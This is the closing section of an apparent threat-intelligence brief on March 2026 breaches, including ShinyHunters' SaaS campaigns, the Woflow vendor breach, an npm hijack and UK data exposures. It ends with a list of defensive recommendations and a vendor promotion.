11. The full scope of ShinyHunters' March 2026 campaign - whether the five confirmed attacks within this brief (plus Figure) share common infrastructure, stolen credentials, or represent a coordinated operation versus opportunistic targeting - has not been assessed by any research firm.

12. Whether Aura's identity monitoring platform detected its own customers' data appearing on ShinyHunters' leak site - or whether the breach was limited to legacy Circle Media Labs marketing contacts as claimed - has not been independently verified.

13. The Crunchyroll breach attribution remains unresolved.

BleepingComputer was told the attacker is separate from ShinyHunters, but Crunchyroll does not appear on ShinyHunters' Tor leak site (while all other March 2026 ShinyHunters victims do), the "hubert" alias selling data on BreachForums is not a known ShinyHunters handle, yet the attack exploited a TELUS agent workstation during ShinyHunters' concurrent TELUS breach using infostealer TTPs consistent with ShinyHunters' earlier campaigns.

Whether this was a core ShinyHunters operation, a peripheral SLSH ecosystem affiliate, or a fully independent actor exploiting the same compromised TELUS environment has not been determined by any threat intelligence firm.

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

Twenty-nine incidents. Eighteen critical severity. More than twenty countries. ShinyHunters ran at least six confirmed attacks in a single month.

The connective tissue across March 2026 is not the diversity of actors or the sophistication of tooling - it is the repeated exploitation of the same defensive failures, now occurring at a tempo that leaves no margin for delayed response.

ShinyHunters demonstrated that the SaaS supply chain is as dangerous as the software supply chain.

Six confirmed attacks in one month - TELUS, EU Commission, Infinite Campus, Aura, Woflow, and Figure - all exploiting the same playbook: vishing or credential theft to compromise a SaaS platform, then rapid exfiltration.

The Woflow breach is the clearest illustration: one 26-employee vendor breached, four of the world's largest delivery platforms exposed. Walmart, DoorDash, Uber, and Deliveroo did not fail at their own security - they failed at vendor security.

The OAuth tokens in that 326GB archive function as persistent keys to downstream systems.

Iran's MOIS demonstrated it can run espionage, information warfare, and intimidation operations simultaneously across multiple groups and geographic theaters.

The Axios npm hijack proved that a single stolen maintainer token can weaponize a library present in 80% of cloud environments - and it took only 39 minutes to poison both release branches.

TeamPCP demonstrated that a single GitHub Actions misconfiguration can cascade into three major package ecosystems in under a month. VoidStealer demonstrated that browser encryption controls are being outpaced by infostealer innovation cycles.

The F5 BIG-IP reclassification demonstrated that advisory accuracy is itself a systemic risk factor.

And the Intoxalock attack demonstrated that cyber incidents now brick physical devices - court-mandated breathalyzers in 150,000 vehicles across 46 states, stranding people, costing jobs, and shutting off cars mid-drive.

The UK data protection failures at Lloyds and Companies House deserve separate attention. Neither was a cyberattack. A browser back button pressed four times. An API update that broke transaction isolation. Companies House holds ISO 27001 and PCI DSS certifications.

Lloyds is subject to FCA operational resilience requirements. Both exposed data that cannot be changed - National Insurance numbers and statutorily protected residential addresses. Compliance frameworks are not security.

The organizations hit in March 2026 did not fail because they faced novel threats.

They failed because they had not implemented controls that have been available for years: phishing-resistant MFA on privileged accounts, credential monitoring for dark web exposure, immutable tags and hash-pinned dependencies in CI/CD pipelines, management plane isolation on hardened workstations, timely patching of edge devices regardless of vendor severity classification, OAuth token rotation and scope minimization for SaaS integrations, and access control testing that catches a back-button bypass before it persists for 152 days.

The management plane is the new perimeter. Your security tooling is your attack surface. Your SaaS vendor is your weakest link. Your vendor's severity rating may be wrong. Your compliance certificate is not proof of security. Act accordingly.

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

Your Attack Surface Is Larger Than You Think. We Can Prove It.